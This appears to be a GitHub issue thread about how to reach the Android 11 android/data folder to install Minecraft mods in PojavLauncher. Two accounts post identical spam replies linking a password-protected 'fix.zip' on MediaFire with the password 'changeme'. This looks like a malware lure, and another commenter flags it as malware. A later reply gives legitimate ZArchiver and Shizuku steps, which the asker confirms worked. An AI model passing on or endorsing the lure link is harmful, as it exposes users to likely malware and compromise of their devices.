### ISSUE TITLE
How to install mods

### ISSUE THREAD

**Issue by mishpro-programm** [PojavLauncherTeam/PojavLauncher#5981]
### Is this request related to a bug?

After android 11 it is impossible to open files inside android/data folder, so how i can install any mod, if minecraft folder is stored inside android/data? I also tried using google file manager but it denies copy to this folder too

### Describe the request.

Minecraft game folder in another location

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mishpro-programm** [comment]
What is this?

**Comment by kasrarouhi** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

It malware

**Comment by ghost** [comment]
It's related to 
https://xdaforums.com/t/android-11-cannot-access-android-data-folder.4225293/

For this download zarchiver app on play store(a file manager) and then download shizuku app (on play store) for ADB. If you not unlocked developer option go to about phone and 7 times click to os version and you unlocked developer option. Go to shizuku app and click on pairing and go to developer option and turn on USB debugging and wireless debugging and other 2 USB debugging (security) option and then after turn on wireless debugging. Enter the password of pairing and shizuku add in wireless debugging. Then go to shizuku app again and click on start. After that select zarchiver app connect to the shizuku for Access to android data folder. And done. Be Shure you turned on show hidden files in zarchiver in file list options

**Comment by mishpro-programm** [comment]
> It's related to https://xdaforums.com/t/android-11-cannot-access-android-data-folder.4225293/
> 
> For this download zarchiver app on play store(a file manager) and then download shizuku app (on play store) for ADB. If you not unlocked developer option go to about phone and 7 times click to os version and you unlocked developer option. Go to shizuku app and click on pairing and go to developer option and turn on USB debugging and wireless debugging and other 2 USB debugging (security) option and then after turn on wireless debugging. Enter the password of pairing and shizuku add in wireless debugging. Then go to shizuku app again and click on start. After that select zarchiver app connect to the shizuku for Access to android data folder. And done. Be Shure you turned on show hidden files in zarchiver in files options

Thanks, it worked👍
